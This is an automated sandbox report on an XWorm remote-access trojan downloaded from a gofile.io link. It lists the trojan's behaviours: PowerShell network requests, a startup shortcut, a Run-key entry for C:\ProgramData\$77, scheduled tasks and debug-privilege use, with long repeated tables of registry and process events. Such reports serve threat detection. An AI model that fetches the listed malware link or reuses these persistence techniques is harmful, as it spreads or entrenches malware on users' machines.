Malware Analysis Report

2024-11-16 13:35

Sample ID 240526-2cb1fafc36
Target https://gofile.io/d/erWKY2
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://gofile.io/d/erWKY2 was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks computer location settings

Drops startup file

Executes dropped EXE

Adds Run key to start application

Enumerates physical storage devices

Creates scheduled task(s)

Modifies registry class

Suspicious use of FindShellTrayWindow

NTFS ADS

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 22:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 22:25

Reported

2024-05-26 22:30

Platform

win10v2004-20240426-en

Max time kernel

300s

Max time network

300s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/erWKY2

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\ProgramData\$77 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Microsoft.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77 = "C:\\ProgramData\\$77" C:\Users\Admin\AppData\Local\Temp\$77.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 956282.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\$77 N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77.exe N/A
